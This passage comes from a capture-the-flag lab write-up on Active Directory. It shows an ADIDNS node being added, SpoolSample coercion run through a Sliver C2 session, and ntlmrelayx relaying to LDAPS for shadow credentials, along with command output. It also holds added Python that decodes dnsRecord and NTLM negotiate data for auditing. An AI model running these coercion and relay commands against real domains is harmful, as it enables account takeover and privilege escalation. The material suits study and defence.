VERBOSE: [+] Distinguished Name = DC=kali.sidecar.vl,DC=Sidecar.vl,CN=MicrosoftDNS,DC=DomainDNSZones,DC=Sidecar,DC=vl
VERBOSE: [+] DNSRecord = 04-00-01-00-05-F0-00-00-1E-01-00-00-00-00-02-58-00-00-00-00-62-B1-38-00-0A-08-02-8A
[+] ADIDNS node kali.sidecar.vl added
PS >
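The DNSRecord hex that Powermad prints above is the raw value of the node's dnsRecord attribute. As an added example, not part of the write-up or of Powermad, this Python decodes that blob so a defender auditing a zone can see what each node resolves to, its TTL and serial, and the hour it was written; the allowed-network check and the record type table are assumptions of the example.

```python
"""Decode ADIDNS dnsRecord values, such as the DNSRecord bytes Powermad
prints when it adds a node, so a zone can be audited for what its nodes
resolve to and when they were written.

Layout (MS-DNSP DNS_RPC_RECORD as stored in the dnsRecord attribute):
  DataLength(2) Type(2) Version(1) Rank(1) Flags(2) Serial(4)
  TtlSeconds(4, big-endian) Reserved(4) TimeStamp(4) Data(DataLength)
TimeStamp counts hours since 1601-01-01 UTC; 0 marks a static record.
"""
import ipaddress
import struct
from datetime import datetime, timedelta, timezone

EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)
TYPE_NAMES = {1: "A", 5: "CNAME", 28: "AAAA", 33: "SRV"}   # assumed subset


def decode_dns_record(blob: bytes) -> dict:
    """Parse one dnsRecord value into a dict of its fields."""
    if len(blob) < 24:
        raise ValueError("dnsRecord shorter than its 24-byte header")
    data_len, rtype, version, rank, flags, serial = struct.unpack_from(
        "<HHBBHI", blob, 0)
    ttl = struct.unpack_from(">I", blob, 12)[0]       # the one big-endian field
    timestamp = struct.unpack_from("<I", blob, 20)[0]
    data = blob[24:24 + data_len]
    if len(data) != data_len:
        raise ValueError("dnsRecord Data truncated")
    rec = {
        "type": TYPE_NAMES.get(rtype, str(rtype)), "version": version,
        "rank": rank, "flags": flags, "serial": serial, "ttl": ttl,
        "timestamp": (EPOCH_1601 + timedelta(hours=timestamp)
                      if timestamp else None),
        "data": data.hex(),
    }
    if rtype == 1 and data_len == 4:                  # A record: IPv4 address
        rec["data"] = str(ipaddress.IPv4Address(data))
    elif rtype == 28 and data_len == 16:              # AAAA record: IPv6
        rec["data"] = str(ipaddress.IPv6Address(data))
    return rec


def decode_powermad_dump(text: str) -> dict:
    """Accept the 'XX-XX-XX' hex form printed in Powermad's verbose output."""
    return decode_dns_record(bytes.fromhex(text.replace("-", "")))


def unexpected_address(rec: dict, allowed_nets) -> bool:
    """True for an A/AAAA record pointing outside the networks you operate."""
    if rec["type"] not in ("A", "AAAA"):
        return False
    addr = ipaddress.ip_address(rec["data"])
    return not any(addr in ipaddress.ip_network(n) for n in allowed_nets)
```

Pulling every dnsRecord under CN=MicrosoftDNS,DC=DomainDnsZones and running it through unexpected_address is a cheap periodic check for nodes like kali.sidecar.vl that point at an address the lab does not own.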
WebDAV to LDAP relay
Finally we need to trigger the HTTP authentication with PetitPotam or SpoolSample:
- https://github.com/leechristensen/SpoolSample
- https://www.thehacker.recipes/a-d/movement/mitm-and-coerced-authentications/webclient
- https://pentestlab.blog/2021/10/20/lateral-movement-webclient/
Thus now we exit and restart the Sliver C2 server,
then we execute
execute-assembly -i -E /payloads/payloads/SpoolSample.exe "10.8.2.138 kali.sidecar.vl@80/blub.txt"
inline-execute-assembly /payloads/SpoolSample.exe "10.18.2.138 vulnlab@80/blub.txt"
Thus:
sliver (sitecar-3) > use b31f8184-a729-480c-b757-1ac3a3e67669

[*] Active session sitecar-3 (b31f8184-a729-480c-b757-1ac3a3e67669)

sliver (sitecar-3) > whoami

Logon ID: SIDECAR\E.Klaymore
[*] Current Token ID: SIDECAR\E.Klaymore

sliver (sitecar-3) > execute-assembly -i -E /payloads/SpoolSample.exe "10.8.2.138 kali.sidecar.vl@80/blub.txt"

[!] rpc error: code = Unknown desc = implant timeout

sliver (sitecar-3) >
Catch it:
┌──(puck㉿kali)-[~/vulnlab/sidecar]
└─$ impacket-ntlmrelayx -t ldaps://dc01 --shadow-credentials --shadow-target 'ws01$'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Protocol Client DCSYNC loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666

[*] Servers started, waiting for connections
[*] SMBD-Thread-5 (process_request_thread): Received connection from 10.10.185.38, attacking target ldaps://dc01
[!] The client requested signing. Relaying to LDAP will not work! (This usually happens when relaying from SMB to LDAP)
[-] Authenticating against ldaps://dc01 as SIDECAR/E.KLAYMORE FAILED
[*] HTTPD(80): Client requested path: /puckshell.txt
Now stuck at this error:
The client requested signing. Relaying to LDAP will not work! (This usually happens when relaying from SMB to LDAP).
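The relay log above shows the coerced authentication arriving on ntlmrelayx's SMB server rather than its HTTP server, and impacket's LDAP relay client prints that exact warning when the NTLMSSP_NEGOTIATE_SIGN bit is set in the client's NEGOTIATE_MESSAGE. As an added example, not code from the write-up or from impacket, this Python decodes a type 1 message and reports whether it asks for signing; both sample messages are constructed here, and which flags a given SMB or WebDAV client sets is an assumption of the example.

```python
"""Decode an NTLM NEGOTIATE_MESSAGE (type 1) and show whether the client
asked for signing. impacket's LDAP relay client prints "The client
requested signing. Relaying to LDAP will not work!" exactly when the
NTLMSSP_NEGOTIATE_SIGN bit is set in this message. Both messages built
below are constructed for the example, not captured from the lab.
"""
import base64
import struct

FLAG_NAMES = {
    0x00000001: "NEGOTIATE_UNICODE", 0x00000004: "REQUEST_TARGET",
    0x00000010: "NEGOTIATE_SIGN", 0x00000020: "NEGOTIATE_SEAL",
    0x00000200: "NEGOTIATE_NTLM", 0x00008000: "NEGOTIATE_ALWAYS_SIGN",
    0x00080000: "NEGOTIATE_EXTENDED_SESSIONSECURITY",
    0x02000000: "NEGOTIATE_VERSION", 0x20000000: "NEGOTIATE_128",
    0x40000000: "NEGOTIATE_KEY_EXCH", 0x80000000: "NEGOTIATE_56",
}
NEGOTIATE_SIGN, NEGOTIATE_SEAL, NEGOTIATE_ALWAYS_SIGN = 0x10, 0x20, 0x8000
NEGOTIATE_VERSION = 0x02000000


def parse_negotiate(msg: bytes) -> dict:
    """Parse the fixed part of a type 1 message plus its OEM name fields."""
    if len(msg) < 32 or msg[:8] != b"NTLMSSP\x00":
        raise ValueError("not an NTLMSSP message")
    msg_type, flags = struct.unpack_from("<II", msg, 8)
    if msg_type != 1:
        raise ValueError(f"expected NEGOTIATE_MESSAGE (1), got type {msg_type}")
    dom_len, _, dom_off = struct.unpack_from("<HHI", msg, 16)
    ws_len, _, ws_off = struct.unpack_from("<HHI", msg, 24)
    return {
        "flags": flags,
        "flag_names": sorted(n for b, n in FLAG_NAMES.items() if flags & b),
        "domain": msg[dom_off:dom_off + dom_len].decode("ascii", "replace"),
        "workstation": msg[ws_off:ws_off + ws_len].decode("ascii", "replace"),
    }


def ldap_relay_blocked_by_client(flags: int) -> bool:
    """Mirror impacket's check: a negotiate that asks for signing is refused."""
    return bool(flags & NEGOTIATE_SIGN)


def authorization_header(msg: bytes) -> str:
    """Wrap a type 1 message the way an HTTP/WebDAV client sends it."""
    return "NTLM " + base64.b64encode(msg).decode("ascii")


def parse_authorization_header(header: str) -> dict:
    """Parse 'NTLM <base64>' from an Authorization header into fields."""
    scheme, _, token = header.strip().partition(" ")
    if scheme.upper() != "NTLM":
        raise ValueError("not an NTLM authorization header")
    return parse_negotiate(base64.b64decode(token))


def build_negotiate(flags: int, domain: bytes = b"", workstation: bytes = b"") -> bytes:
    """Construct a type 1 message (test input only; no Version block)."""
    flags &= ~NEGOTIATE_VERSION                  # keep the payload at offset 32
    hdr = b"NTLMSSP\x00" + struct.pack("<II", 1, flags)
    hdr += struct.pack("<HHI", len(domain), len(domain), 32)
    hdr += struct.pack("<HHI", len(workstation), len(workstation),
                       32 + len(domain))
    return hdr + domain + workstation


# Constructed: an SMB-style negotiate asking for signing and sealing, and an
# HTTP-style one that asks for neither (the case the relay can forward).
SMB_STYLE = build_negotiate(0x00000001 | 0x00000004 | NEGOTIATE_SIGN | NEGOTIATE_SEAL
                            | 0x00000200 | NEGOTIATE_ALWAYS_SIGN | 0x00080000
                            | 0x20000000 | 0x40000000 | 0x80000000)
HTTP_STYLE = build_negotiate(0x00000001 | 0x00000004 | 0x00000200 | 0x00080000
                             | 0x20000000 | 0x80000000)
```

The SIGN bit is only the client's request; on the defensive side it is LDAP signing required and LDAPS channel binding on the DC that stop an HTTP-sourced relay as well.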
To be continued …